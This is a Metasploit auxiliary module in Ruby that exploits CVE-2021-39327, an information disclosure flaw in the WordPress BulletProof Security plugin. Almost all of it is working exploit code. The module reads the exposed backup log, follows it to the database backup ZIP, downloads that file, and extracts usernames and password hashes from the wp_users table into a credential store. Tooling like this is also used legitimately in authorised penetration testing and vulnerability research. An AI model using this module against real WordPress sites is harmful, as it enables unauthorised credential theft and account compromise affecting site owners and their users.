Wordpress BulletProof Security Backup Disclosure

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'rex/zip'

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HTTP::Wordpress
  include Msf::Auxiliary::Scanner

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Wordpress BulletProof Security Backup Disclosure',
        'Description' => %q{
          The Wordpress plugin BulletProof Security, versions <= 5.1, suffers from an information disclosure
          vulnerability, in that the db_backup_log.txt is publicly accessible.  If the backup functionality
          is being utilized, this file will disclose where the backup files can be downloaded.
          After downloading the backup file, it will be parsed to grab all user credentials.
        },
        'Author' => [
          'Ron Jost (Hacker5preme)', # EDB module/discovery
          'h00die' # Metasploit module
        ],
        'License' => MSF_LICENSE,
        'References' => [
          ['EDB', '50382'],
          ['CVE', '2021-39327'],
          ['PACKETSTORM', '164420'],
          ['URL', 'https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2021-39327/README.md']
        ],
        'Privileged' => false,
        'Platform' => 'php',
        'Arch' => ARCH_PHP,
        'DisclosureDate' => '2021-09-17',
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [],
          'SideEffects' => [IOC_IN_LOGS]
        }
      )
    )
  end

  def parse_sqldump_fields(line)
    # pull all fields
    line =~ /\((.+)\)/
    return nil if Regexp.last_match(1).nil?

    fields = line.split(',')
    # strip each field
    fields.collect { |e| e ? e.strip : e }
  end

  def parse_sqldump(content, ip)
    read_next_line = false
    login = nil
    hash = nil
    content.each_line do |line|
      if read_next_line
        print_status("Found user line: #{line.strip}")
        fields = parse_sqldump_fields(line)
        username = fields[login].strip[1...-1] # remove quotes
        password = fields[hash].strip[1...-1] # remove quotes
        print_good("  Extracted user content: #{username} -> #{password}")
        read_next_line = false
        create_credential({
          workspace_id: myworkspace_id,
          origin_type: :service,
          module_fullname: fullname,
          username: username,
          private_type: :nonreplayable_hash,
          jtr_format: Metasploit::Framework::Hashes.identify_hash(password),
          private_data: password,
          service_name: 'Wordpress',
          address: ip,
          port: datastore['RPORT'],
          protocol: 'tcp',
          status: Metasploit::Model::Login::Status::UNTRIED
        })
      end
      # INSERT INTO `wp_users` ( ID, user_login, user_pass, user_nicename, user_email, user_url, user_registered, user_activation_key, user_status, display_name )
      next unless line.start_with?('INSERT INTO `wp_users`')

      read_next_line = true
      # process insert statement to find the fields we want
      next unless hash.nil?

      fields = parse_sqldump_fields(line)
      login = fields.index('user_login')
      hash = fields.index('user_pass')
    end
  end

  def parse_log(content, ip)
    base = nil
    file = nil
    content.each_line do |line|
      if line.include? 'DB Backup File Download Link|URL: '
        base = line.split(': ').last
        base = base.split('/')
        base = base[3, base.length] # strip off anything before the URI
        base = "/#{base.join('/')}".strip
      end
      if line.include? 'Zip Backup File Name: '
        file = line.split(': ').last
        file = file.split('/').last.strip
      end

      next if base.nil? || file.nil?

      vprint_status("Pulling: #{base}#{file}")
      res = send_request_cgi({
        'uri' => normalize_uri("#{base}#{file}")
      })
      base = nil
      next unless res && res.code == 200

      p = store_loot(file, 'application/zip', rhost, res.body, file)
      print_good("Stored DB Backup #{file} to #{p}, size: #{res.body.length}")
      Zip::File.open(p) do |zip_file|
        zip_file.each do |inner_file|
          is = inner_file.get_input_stream
          sqldump = is.read
          is.close
          parse_sqldump(sqldump, ip)
        end
      end
    end
  end

  def run_host(ip)
    vprint_status('Checking if target is online and running Wordpress...')
    fail_with(Failure::BadConfig, 'The target is not online and running Wordpress') unless wordpress_and_online?
    vprint_status('Checking plugin installed and vulnerable')
    checkcode = check_plugin_version_from_readme('bulletproof-security', '5.2')
    fail_with(Failure::BadConfig, 'The target is not running a vulnerable bulletproof-security version') if checkcode == Exploit::CheckCode::Safe
    print_status('Requesting Backup files')
    ['/wp-content/bps-backup/logs/db_backup_log.txt', '/wp-content/plugins/bulletproof-security/admin/htaccess/db_backup_log.txt'].each do |url|
      res = send_request_cgi({
        'uri' => normalize_uri(target_uri.path, url)
      })

      # <65 in length will be just the banner, like:
      # BPS DB BACKUP LOG
      # ==================
      # ==================
      unless res && res.code == 200 && res.body.length > 65
        print_error("#{url} not found on server or no data")
        next
      end
      filename = url.split('/').last
      p = store_loot(filename, 'text/plain', rhost, res.body, filename)
      print_good("Stored #{filename} to #{p}, size: #{res.body.length}")
      parse_log(res.body, ip)
    end
  end
end